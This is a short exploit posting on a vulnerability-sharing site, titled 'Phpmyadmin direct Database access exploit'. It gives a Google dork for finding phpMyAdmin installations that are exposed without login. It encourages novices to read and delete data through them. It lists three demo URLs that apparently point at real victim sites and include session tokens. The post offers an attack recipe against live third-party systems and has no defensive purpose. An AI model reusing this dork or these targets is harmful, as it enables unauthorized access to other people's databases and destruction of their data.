当前位置:
首页 > 漏洞 > Phpmyadmin direct Database access exploit

Phpmyadmin direct Database access exploit

# Discovered by: [ssgodfather]
# Presented by : J|nX
# Category:: webapps
# Google dork: allinurl:index.php?db=information_schema
=====================================================================================
+ Description:
dork:allinurl:index.php?db=information_schema
for n00bs:search this dork in google!!
This dork bypasses the username and pass and takes u directly to information schema tables to get data and u can delete data!!!!!

# Demo vuln site:
1+ http://rumult.com/rapidsearch/phpMyAdmin/index.php?db=information_schema&table=USER_PRIVILEGES&server=1&target=tbl_export.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=bbd044d13be89aa2cabd6060eaebe142
2+ http://mirrorhotties.com/cc/pma/index.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=372441dd9658e344c6876f8ee883d388&db=information_schema&phpMyAdmin=auKAmyi-oqI042ihsaufGUaze73
3+ http://golf.amor.org/backup/admin/index.php?db=information_schema&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=bb8e1919cc947e7d71c43ecf9029f0a4

Phpmyadmin direct Database access exploit:等您坐沙发呢!

发表评论

表情
还能输入210个字